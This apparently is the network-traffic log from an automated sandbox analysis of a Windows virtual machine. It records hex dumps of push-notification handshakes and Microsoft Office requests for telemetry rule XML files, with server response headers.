                                                                                                                                                                      2024-11-21 05:24:12 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 46 79 6d 36 61 64 49 57 61 30 53 52 50 59 66 5a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 62 37 37 31 65 39 63 37 38 33 61 65 39 36 34 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: Fym6adIWa0SRPYfZ.1Context: bb771e9c783ae964
                                                                                                                                                                      2024-11-21 05:24:12 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                      2024-11-21 05:24:12 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 46 79 6d 36 61 64 49 57 61 30 53 52 50 59 66 5a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 62 37 37 31 65 39 63 37 38 33 61 65 39 36 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 72 79 47 49 6c 4b 61 41 6e 50 4f 46 75 6f 37 50 51 78 50 4e 74 7a 2f 55 50 53 70 47 64 79 36 48 49 54 55 4f 41 43 33 4e 76 34 6c 65 44 43 4b 77 6e 41 30 38 78 51 77 58 4f 6d 56 74 55 72 69 36 61 48 65 59 71 38 6d 50 64 46 34 6a 77 51 57 6d 37 79 4c 42 44 64 34 41 5a 52 38 41 6e 45 5a 4d 4f 4b 63 4f 5a 7a 4d 6f 41 2b 2f 62
                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Fym6adIWa0SRPYfZ.2Context: bb771e9c783ae964<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXryGIlKaAnPOFuo7PQxPNtz/UPSpGdy6HITUOAC3Nv4leDCKwnA08xQwXOmVtUri6aHeYq8mPdF4jwQWm7yLBDd4AZR8AnEZMOKcOZzMoA+/b
                                                                                                                                                                      2024-11-21 05:24:12 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 46 79 6d 36 61 64 49 57 61 30 53 52 50 59 66 5a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 62 37 37 31 65 39 63 37 38 33 61 65 39 36 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: Fym6adIWa0SRPYfZ.3Context: bb771e9c783ae964<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                      2024-11-21 05:24:12 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                      2024-11-21 05:24:12 UTC58INData Raw: 4d 53 2d 43 56 3a 20 41 71 41 32 42 6d 53 6b 72 6b 57 7a 5a 6d 4f 62 36 6c 55 65 69 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                      Data Ascii: MS-CV: AqA2BmSkrkWzZmOb6lUeiA.0Payload parsing failed.


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      135192.168.2.64990813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:13 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:14 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1362
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                      ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                      x-ms-request-id: 270c2d5d-601e-00ab-2f8c-3a66f4000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052414Z-1777c6cb754vxwc9hC1TEBykgw0000000agg00000000ratt
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:14 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      136192.168.2.64990713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:13 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:14 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:14 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                      ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                      x-ms-request-id: 852b0afa-d01e-00a1-0e9b-3b35b1000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052414Z-1777c6cb754vxwc9hC1TEBykgw0000000ang000000009u77
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:14 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      137192.168.2.64990613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:13 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:14 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:14 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1399
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                      ETag: "0x8DC582BE976026E"
                                                                                                                                                                      x-ms-request-id: 0b679675-f01e-005d-336b-3b13ba000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052414Z-178bfbc474bwh9gmhC1NYCy3rs00000000z000000000v3hf
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:14 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      138192.168.2.64990513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:13 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:14 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                      ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                      x-ms-request-id: bfe6e8fa-201e-006e-3f8c-3abbe3000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052414Z-1777c6cb7544n7p6hC1TEByvb40000000apg00000000nyhy
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:14 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      139192.168.2.64990913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:14 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:14 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1425
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                      ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                      x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052414Z-178bfbc474b9fdhphC1NYCac0n00000000ug00000000t9tu
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:14 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      140192.168.2.64991113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:16 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:16 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:16 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1388
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                      ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                      x-ms-request-id: 607d0db8-301e-0052-4363-3b65d6000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052416Z-178bfbc474bfw4gbhC1NYCunf400000000z000000000httc
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:16 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      141192.168.2.64991213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:16 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:16 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1415
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                      ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                      x-ms-request-id: d606dcfe-601e-003e-695e-3b3248000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052416Z-178bfbc474bvjk8shC1NYC83ns00000000sg00000000sht8
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:16 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      142192.168.2.64991413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:16 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:16 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:16 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1405
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                      ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                      x-ms-request-id: 2e331142-b01e-001e-697c-3b0214000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052416Z-1777c6cb754xjpthhC1TEBexs80000000abg00000000u0ur
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
